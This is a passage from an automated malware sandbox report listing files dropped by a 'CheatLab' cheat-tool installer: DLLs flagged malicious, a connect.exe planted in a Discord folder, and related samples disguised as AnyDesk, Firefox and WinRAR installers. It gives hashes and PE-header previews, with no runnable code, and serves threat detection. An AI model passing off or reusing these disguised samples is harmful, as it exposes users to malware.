                                                                                                                                                                                                                            SHA-512:702859E7C97C5BCE19BDF58E2342F191D2E24344C7E563C34E3D77A3F70D1A2BE98A9C0166709927282D8F3F9167E252014BF68816B85D7C86E3591294050AA3
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2232
                                                                                                                                                                                                                            Entropy (8bit):5.379736180876081
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZCUyus:tLHyIFKL3IZ2KRH9OugUs
                                                                                                                                                                                                                            MD5:FF2AF1BF2F5129579889F2F72DFC0CC7
                                                                                                                                                                                                                            SHA1:64517DC60A04D1F1DBEEF3590621E258B794580C
                                                                                                                                                                                                                            SHA-256:A7E62AC617F75DEA9DFB21323BE154A14B7F2EAF66DE97A68DEB976EF539F888
                                                                                                                                                                                                                            SHA-512:7CCBA6A3735E19B6B7284BD8E60B85677C5DAB8F59FFC4949BDC49CF8E7768F6260DC7AA00C049031AE442BFFD2A60E4D7CC27DA2C776EBAC415B64928D77582
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MSI8FE.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):446944
                                                                                                                                                                                                                            Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                            • Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Cheat.Lab.2.7.0.msi, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: AnyDesk.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: AnyDesk.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: winrar-611br.msi, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Firefox-x64.msi, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: AnyDeskAPP.msi, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: 6p2LSuB1em.msi, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: AnyDesk.msi, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: MERC_PG_MDLS.msi, Detection: malicious, Browse
                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MSI91F.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):446944
                                                                                                                                                                                                                            Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MSID42B.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):446944
                                                                                                                                                                                                                            Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MSID4A9.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):446944
                                                                                                                                                                                                                            Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MSID4C9.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):446944
                                                                                                                                                                                                                            Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MSID4E9.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):446944
                                                                                                                                                                                                                            Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MSID538.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):446944
                                                                                                                                                                                                                            Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MSID5C6.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):919520
                                                                                                                                                                                                                            Entropy (8bit):6.451406895673526
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:rx90VXSK4fSa6HXr1iWn8Zlv2x4ntHurpllQ6a:Nq4Fb6HXr1iWnYs4ntHurpllQ6a
                                                                                                                                                                                                                            MD5:6189CDCB92AB9DDBFFD95FACD0B631FA
                                                                                                                                                                                                                            SHA1:B74C72CEFCB5808E2C9AE4BA976FA916BA57190D
                                                                                                                                                                                                                            SHA-256:519F7AC72BEBA9D5D7DCF71FCAC15546F5CFD3BCFC37A5129E63B4E0BE91A783
                                                                                                                                                                                                                            SHA-512:EE9CE27628E7A07849CD9717609688CA4229D47579B69E3D3B5B2E7C2433369DE9557EF6A13FA59964F57FB213CD8CA205B35F5791EA126BDE5A4E00F6A11CAF
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O...!S..!S..!S[."R..!S[.$R=.!S.%R..!S."R..!S.$R..!S[.%R..!S[. R..!S.. S..!S3.(R..!S3.!R..!S3..S..!S..S..!S3.#R..!SRich..!S........................PE..L...a<.a.........."!.....X...................p...............................@.......|....@.........................`A..t....A.......0.......................@..L...(...p...............................@............p...............................text...nV.......X.................. ..`.rdata.......p.......\..............@..@.data...<....`.......@..............@....rsrc........0......................@..@.reloc..L....@......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MSID605.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):446944
                                                                                                                                                                                                                            Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MSID626.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):446944
                                                                                                                                                                                                                            Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgaeg2at.0j5.psm1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sx0obgee.vab.ps1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ttoxkrhf.ivm.psm1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2ucdrgo.1qz.ps1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
